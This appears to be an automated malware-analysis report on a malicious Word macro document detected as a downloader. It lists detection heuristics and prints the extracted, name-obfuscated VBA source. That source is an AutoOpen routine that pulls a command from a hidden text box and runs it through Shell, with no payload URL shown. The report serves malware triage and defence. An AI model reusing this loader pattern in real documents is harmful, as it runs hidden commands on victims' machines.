MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Microsoft Office document containing VBA macros. The 'autoopen' macro is present and utilizes the Shell() function, which is a critical finding indicating an attempt to execute arbitrary commands. The heuristic 'SC_STR_CMD' further confirms suspicious invocation of cmd.exe. The ClamAV detection name 'Doc.Downloader.Valyria-6786378-0' suggests a downloader functionality.
Heuristics 9
-
ClamAV: Doc.Downloader.Valyria-6786378-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6786378-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set whzGutQMXKFLwpFj = BirNbDapsKpzou zIYVUU = Array(irrbNr, dCjHuUG, joNKZtW, Interaction.Shell(qZvjmYwVJ, WsFklTAWmGH), jVPfBGE) Select Case UvCcVulwUAaJUWRJfK -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() PUOGPMYEH -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12007 bytes |
SHA-256: 7aae02c68ab02b2a667a00ecd693392ff15c40e661c0d18136ba0a0991d97506 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
327 of 371 identifiers look randomly generated (e.g. 'AMnCMqBocGPtLTLzdWotDMLP') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nKutkAsDiRl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
PUOGPMYEH
End Sub
Attribute VB_Name = "jFLspwZVzOFpw"
Function PUOGPMYEH()
On Error Resume Next
Select Case RdTutMtvJQKrSOukE
Case 299900804
XDBqHUGmKcASWjUpHuaRFlrp = osiRAcXCnkMPmLanaiTJwnHz
nqdbulLMrSbXVJAdPjw = Log(ZUiAiiDYfAAkksN)
tbtwADvswPFYTjiEJpzTHd = 326357724
injqSqncwNjoqzIWZ = BOYfFzRwbvsuiPddQNWEaH
Case 189123834
bFwuOJjdtRbjqDhhYWPr = 238608210
iULMjvzVPtlwDA = Log(XhSOPANnumMfpf)
slsZWcjBZliYBh = 325429029
AhiBowcUBVjQZXPJqLBADdd = Log(ofsdlcLGwsMzKdPvJXX)
End Select
Set wScCWUiqjzqWEE = IEzjZJaThLRwMvFr
Select Case UjVYsuoOhrHkIX
Case 62252542
CvXZztqZRfbCiRWSCViNVjcb = LYTIqSSvNpWHQAa
vGMTmkPUpimtviWSwRnUWR = Log(NIGQczLmUEXZZQHVbJz)
IfZziTDLwNFUifzLfU = 253952034
dwRpYFwCowMKXwShjG = JvAnHwCvuQwpHXipLNjbd
Case 148568683
WBAuzjNRbYmdYd = 56983193
qVJClsHFnsIGTzfD = Log(udmGDFOjzUQUuFLCDsFTUP)
uvHEXGzctiqiAWDnPvVm = 157061455
ktnzDQGZkSizsLwBqaBrXmD = Log(LjzFpYwdGDKNRaChWTw)
End Select
Set zBdsrOEukjTwpLlWQB = LTAspBikQYUVDojbKDHOb
Select Case vBfMCBiXfHHmMuwzZMNCmcfn
Case 238625836
RihpOpoIYAlVIHjiamGBfC = oXKbBLTWsbPjDpqtR
EVwMEDFTECtjiIOLtREOnwFi = Log(ttYfsjtpEahUcTHWiHRdLtH)
rvZoDKIQTTKJhnLSAr = 196120372
hrRzwsEooBhzlDnwKEluS = AIIzovwwcTPamAibr
Case 74666859
TbSmLXizOIwGjOQ = 279193178
pzDJspYNjLQnSiM = Log(owphWzZKvhpjNjLVKWm)
HvbluYbMNMwakjvPbIlratO = 70427922
rzDAudvwTSsXDn = Log(WNwjlPwhlvtBluSOhQlCYXLS)
End Select
Set AdQNCsYVnUMwfZkvSSEAb = BBEKHRkZzBiAllfT
Select Case izLXVjjdwZrUzfHouJmNvk
Case 143208823
XOjsTDaNELHiljh = wzPWHBSwvdpHzlqwdCzHCrKt
dPmYYCKcqRwVzBWvkzpNSPTU = Log(EjkatEnWWilfXWb)
fHTsdiBdLRuUfjNwRQUT = 176317462
zNKzcWkQNaOinI = ciahGPbKSqpQpOHCHEdJGhiB
Case 201617925
uETGztFzolulUmWCsImGuBG = 161186773
iJzsuAYDNUXrMtw = Log(rZVIVjqnDpVOYwsw)
zSkGEukViGSwLfPqvDckQlu = 122977149
oFiJiObZwNaLFnfl = Log(mcYosJGXdvQNiNXRtPoGLE)
End Select
Set qZOSofqQzzdzRtXwwXmBTLL = zCuLXqibikiPiqRsm
Select Case iQQTAQoLvpjGzci
Case 33986503
iXdnlqdPdGWXziTsAvmkiQ = AwwDMGVhtsQENjRsZ
DWKRowGNNzhwUIRHcpnnRJ = Log(YciidFMjDMzatFi)
CwzsWAzXInGDcFm = 139047492
PmpKNdHBPijXhXBujkqSRlX = HaqzJGzacjiTtzpTrrGW
Case 94044765
aQFIwUvDcdOJCmmIrJjJuBsi = 10648029
vXaaiBQHzauBKdiZDAEj = Log(CjjzzpFFZXXGPYYcCwNtvmMO)
zDiVwrdSktqqahLLCaDXuu = 28209339
wABrqAPUVJzmajb = Log(toifilcRBhtMJrvEzYYz)
End Select
Set lcjdVVRjZlSzXdGPYXKYkq = HDLdNtmBLdpIMvC
Select Case QTCOVMLIiavorqiCwzMd
Case 80516729
wIjHaErjLLidCmm = JOjuStGolLjOHzTDRGWuiNmG
BOjFOowQCqzwRqCBs = Log(OYcZOsiLvPrNvbadQf)
iWXkwEHVHAPUsprXip = 188060004
rbCsjYpuVWoaXf = zrodUGWXLfvzXEEr
Case 264138395
ifHUiDaONzkLpzNjrjtLIt = 135311566
qNlYSpRfAlszCi = Log(kCFtXnzpzlqMXzcj)
KDiQSBwXhFLEENdMTJJCz = 324922387
qYnnccuhXFHozAvSA = Log(WpholtXMzEoTdlN)
End Select
Set nsiOTunYowzZiMXqItdHjC = uPPcqsEcVbNNDnmpbCJAmv
Const WsFklTAWmGH = 0
Select Case TABYsHoaPmEEWbtkEBfvSV
Case 282814915
uvLUAjmLKYSjtLFaFwoFs = qiRKvKRTXzKSdww
ZjzttwJMqsvFqThkqp = Log(jDpkctqAUWbhIdk)
EGzLsVEUCOLdEPZbnsP = 113207431
wXzCzoqPLnbFtcirdMLzV = NiNwEzztQNTpGiAIujNEr
Case 183600922
XKmukKfESORKRpBktPRWO = 252227550
WwrURflQqlzplR = Log(PjkJBbpYiTtwUp)
FWlGQzspOZjzaYTzQSp = 341125017
lEldhXIBXiQbPjbEfBFXt = Log(jUdOzPUdiiptTRAciZ)
End Select
Set oqqQVLsrukQkcnPVQzTYs = uElmWMKECTfmFftEICHY
Select Case NtOmhWTmpULJGWCqHzMs
Case 60546054
vUjzQQjHSmYBiNLp = YFsonjfPLGGvOYo
AwuDhGDFiBZkFrpfRo = Log(nRYHoDjEKaLDNkhiPRlbRC)
GmHuKTRadakACbqGzzCsfW = 327868152
AYMaOjNWliSVjJZk = ziddjiDYLmdPJGjovtmHqMz
Case 88945647
PXJUZqYRAfoUiRtJ = 9950951
tjGbXihlPndBml = Log(QTHuEmwEzJbvTMctz)
JDdHnzamnblowsDESwlPwR = 323331063
ISwnNZmujMdhlIfHTRwV = Log(JLisOuiHhssGwwVDmY)
End Select
Set orIlPWTJSdviSbLz = NvziImwTkanKKEh
Select Case BzEkNsTcBYHqpMTr
Case 26145507
vUDpTMBjGuikbfmaiJRwHBB = JVFMZANzVWbjIMdrjjmYtQz
EOiJZHmuSJfzHoHGhiP = Log(ECRWfZNaOdAsYdI)
VDaOkhQwjjkuZjrK = 11697077
XBwIdztLfpJmZdjwkdIAUWl = pzpTBimprjGGNNaaV
Case 164820457
bpuGGNcwOCBXAP = 197591204
iKaKwDTusXaiWDifvU = Log(cusiFYmYnpJFqjuv)
uOFXWzOjntZLUVbjF = 7182837
lbUlKfjFiSjzbHRkjPm = Log(uizSiNMTUiYkiWK)
End Select
Set adusqufQDuwDCluQTuiGbC = wSNkAtwQFzcKDUt
Select Case vkzTmRCpcZraCEtluwn
Case 46668250
XzpNnRqCaMBZObmWBlUvvua = TkEinXZVkhXmJF
AMnCMqBocGPtLTLzdWotDMLP = Log(nfojEzMvmTiIsO)
SwbXXiNBYktQVLvo = 7247789
zYKMHYGDzYAdolIdbGk = rYaiPvKjrjrfhkspAFoDRT
Case 216903388
BvvIHskoDNfbwjzLOWMNhU = 316821468
sScVShWXrlcUAC = Log(wzCcTERrTIcouHTHjzr)
pPPWVrHkNEdLMuNOf = 295779584
zabJNptbQYdwUJlmjjj = Log(cwhdPiRczuEcnWr)
End Select
Set OGBjcPrLjHICaIiizmzCtz = iXQbVTBIwRwYciziMEVtHWP
qZvjmYwVJ = nKutkAsDiRl.TextBox1 + TJLnW + zKkdjBw + ZcBXov + mzXDm + NkEuY + cAHQOpS + ctkqXNa + dLIMfYH + wDRzK
Select Case HsAjioqfWUHzlkztOtfn
Case 5751678
tEcqlUYOhHzsCPwimmiIk = GhBdDsdEahiZwvG
CWGImAzshjzkHsJswowvoHR = Log(kdjSOcRAXukIBcSGiIwT)
tzhYldKwLDuEbYJTjiFSwMMI = 5311168
UVsNfLwjrjwuczHDMrpDaEJ = BiqAzhkZXuJoEzXjGrjdVm
Case 15652114
LszVSwRQMGLBUzk = 66175017
ZWhpSzOTGziXfQPbkpHhOGac = Log(cwmWOIGWhwPUQttkCMzitjp)
ZkHdchSwFwpAcwspcAzUAHUw = 91790445
MubtzwIqzdAduAdSOTDsIFTK = Log(tjVvRPLPfVYVLzt)
End Select
Set lzOowFwqhsBsVoGaRnGMnvf = pOOfFzDWKzWGEVIn
Select Case YiCwRFwGMsDdivIih
Case 304190655
WMWwwiPaCOszhVXjt = kjblLuADLzrLctadfEBf
SCfwsTsWHKLPDz = Log(mkAczuTQjqlzZEpT)
NbRjwoSbIhDofvZwPquDZ = 221249180
zlvGHUSRRqdCbfi = viBpNPbDuMCKNvPHfSSvAi
Case 74302820
pPlzBtzQlAwVYsv = 235997150
sLuRIEWbVWJNipNX = Log(zzddCAOmYNwujnWikIXQpjL)
WfXoCCKlwiswFjpKj = 201372395
qahmimiwhpGETmPHWdZjW = Log(KvEvYcESMkLzUo)
End Select
Set tpCXEdvraYLqZThGuMoPli = OCtOdWtVRaSdoXMSYOEiWM
Select Case OSlkqIJwizTRVX
Case 65074773
uhpRYWHmlEuAUbDRKPtXH = slFEwFwkvrEMzvwScrLzwlNI
HuCHFimivpDMUYBpBJD = Log(IcHVsmBMIAGYzdrLtcpNSiDG)
GITJJwcKMSinhPSdaWuifOq = 216027770
wYUpiaYBclihCwDiNlKMYMN = jrLJXMrRnSNYIUisFl
Case 30928851
owXXrERdjTSjLzGmOPiQ = 304012963
ujkfWtDSHmHjinTo = Log(SuNkTAdNKOvdpHojb)
nnLiYaOMjcbOSS = 174530370
LVjcajGRLfHoSiTAHljAGkWn = Log(GUBmvvdDrwSDzbEjtW)
End Select
Set TauBJaHhmZrbwsFUPFfPjil = iAzHJbTMNdUwMSsLoOq
Select Case mDWYwVtdjjkXaOcItXGz
Case 59822234
CcOUAirLzEblNRYG = EOEXPmzwBiklIXzXYB
JbUPmYjjwoAKjmACiEpmpRX = Log(zGZrhdOoQdzujwRzfGAHAUAw)
UOSiOEsEVQfwswS = 175556456
uFpFSjnqHjQPwfFb = MOwFBZFqNilAnHhhoZuJC
Case 13558138
isHVboXlaWImEiGsjjOF = 8142362
pUbiiJFKRhKjRN = Log(DdBpzLdiUdCihNZnwddCmts)
OfPFbcUNszdFNPD = 277253602
pGFfaXwruNFnLIJl = Log(bRvYDsIpqkkTahanqwnnbnI)
End Select
Set NhOPZhpUUSomunmOw = knMXTjfAULWzToJdLWdtPJ
Select Case cfOfsVzivaVUtwOrOWE
Case 292409784
LXcHUKzZszQKtoAmkkCwwiTz = dcPdikTRiRIlXXKAJCbFJ
KNFimCvAcDfXrikvKOwtPXrA = Log(MswmfssadSBYEwRV)
oFGAfbPNsMIQknWERZJz = 93862464
LnwOQiXFQfYlimtMjQjYmfjK = ifTmYHWPruTERLjqmwdswFj
Case 70435842
ttSpJfDlVlDETsX = 13626845
qsaIPEziAjGSuZvIhf = Log(DZiOPSwadmTEFqbOr)
zdoSHJwzTaLHvlMJwzIdL = 274496284
iWwjfAcTKEYkBZkSY = Log(SzWPVrhrvriGOYHLK)
End Select
Set KdQwqHADWBKjNijKsqwPAEwn = koEqAcqPoHvCVIP
Select Case iloXVJuKpvQSbHt
Case 72382575
ctnoJbcJQAvsSwcARQO = tFHpslfbiwEtjfoHJRYKMO
IzRXznRKrfWhWmw = Log(YvAiUvBLmIVqAsEbfBwqaNjo)
mNOJzSULUAOMjkMw = 43272470
qSaKwbuCVnHVKPMRhimBo = AffspPvQmrTcpVmbPnOvzj
Case 23073122
pwASCiMFwARvfGlfGEBQBiZq = 206160242
TwmttTbjDqPdNIf = Log(jpErwICjpsfnwGYJm)
KNSCGzTwCuQcrtknCkmoKKwD = 29489216
oojwSFrQzRwdiG = Log(zFITMAlCJEoXwmARPwF)
End Select
Set iPGcKlawTqZBfQN = okrACmZsdisiwA
Select Case nSmCfOAtztCtLicWhJCcz
Case 123301277
cwjiVmbzaWcrsiTRTOCNQ = vfmCtOOoWlUjJEzjfGYtcX
njnNrjNwFVoCAsStMlmzr = Log(LZPSkjwoWMYwwTFAWF)
pPKVBwqMMLIpYrR = 157313968
wZwizQzbiEuwoMOhq = HBEOTtWkcNWzEh
Case 311226310
CwGipwLtWuwOXztIhqJWKj = 41114102
IPolEizNDzKRbLL = Log(qKsZwIMdUOROXYf)
qAWaKZorujKZobhWi = 5162340
zrhJzDKRqMkpiSsbbolz = Log(WAiNzmoshvkWsjaJq)
End Select
Set XzIziKtfHwAFhtBPdr = vCRWYJRATmlRRk
Select Case jhENjzTPWhhPbjOb
Case 6557549
wJEUKkYGblZRqMPVSn = KkDOKpBhYblqYJtBdHL
UpZXhqFqUzFNbBqlvut = Log(ICzipuAIzLmNGPFULfhU)
LNZVXPWSIGiNhPRpuhmpw = 298324375
MsHLvWaQNZtwpaJS = ippEEAZAofQzuioSDNdQ
Case 26704766
whqVonScPlPHLHEEIrh = 73217117
qJSTuFilMfBbDsH = Log(iLmhLQfhmSjNwElis)
GXXCthnqCFNjIOwqZj = 314463334
wZikjcYQnHuTikmjqjRE = Log(UOZUGKSRHfFmPWjsnVRIWDu)
End Select
Set uzXbNAtOrjbLEQZR = zfcpjTNGqCKAvWR
Select Case AXCYXrBrmjjidpQ
Case 64777967
OKKtrVDpisojAImiqwvHV = pVnSbvhzXmwbcf
MJBwiszNIlXtAnrUCPMVoGYt = Log(HhVBmYjHidotImI)
IijDChJfStMPJKGlIqaLiL = 143840351
rlSJCbtdDfjbsqGa = pjsMQwXXDlSLzLwITM
Case 107974906
zdqAiMiiisRkAnocd = 8284758
nvmzpbRFTjSZdpLXMss = Log(EUstKTiLJXUfRmcTNiBY)
GKvLTnupQcjkXVTCs = 264173265
tFwwOmHrMrKiqULwJz = Log(rjnWtukvtQJRUpjfLJOjY)
End Select
Set whzGutQMXKFLwpFj = BirNbDapsKpzou
zIYVUU = Array(irrbNr, dCjHuUG, joNKZtW, Interaction.Shell(qZvjmYwVJ, WsFklTAWmGH), jVPfBGE)
Select Case UvCcVulwUAaJUWRJfK
Case 209037556
uOiCDRjahBrtNPCwibG = dKTrvdTdJazTara
NzYDLLPTIhwETVb = Log(DZzkuqHazFQGDX)
VpwijCCuSvAiOhPJo = 336993669
PBtqLWswGFuIPkOaOXmsCBi = ouIsthvcHKIRczkMqDwp
Case 158229270
kzzGAmBGqOWOBRNzFYKSBE = 190790521
wPmZBzEpGBJKsmhJaAUtuNwT = Log(rzXfFlfUCIlzcFqJhHzHDHTr)
rAkjDkQSbKBhKB = 106989382
qqdvKwudjMFzMvjijiOl = Log(lwXUjBvpcXGjdNQpvqsFGzqf)
End Select
Set GfaXAfmfiFrGbdzzo = pwQjiSoloVfolIs
Select Case iRXbGwfmlTlWMoXW
Case 194947398
ISoVPkZfpnodCAlZohiiCEvz = dmJFiHLqMPOWJB
BaHswHRlknAprwwDXrTmzQ = Log(GfdmpkWCfjqcczDzuLB)
RiSTsPMrfqOqlAAMUVb = 9076096
lUIAVUGTsZbwrIYNK = aYiXpSArbwriYkzKjNJSWuF
Case 162206770
QnuusczKbBdkOfqAitJbNA = 283087362
hcLDrXfSFjYiGzjUsUziWaRh = Log(SrBwwZQwzMQRvSDVL)
iHLuhKojsCIZHKdlZjiV = 60449485
HiIkSDzCuNLvnaHY = Log(qHMjNoXFGoKsXqpV)
End Select
Set zdlwrlmqIuOLWCiBVn = wdtukiMPmJXXWaTad
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.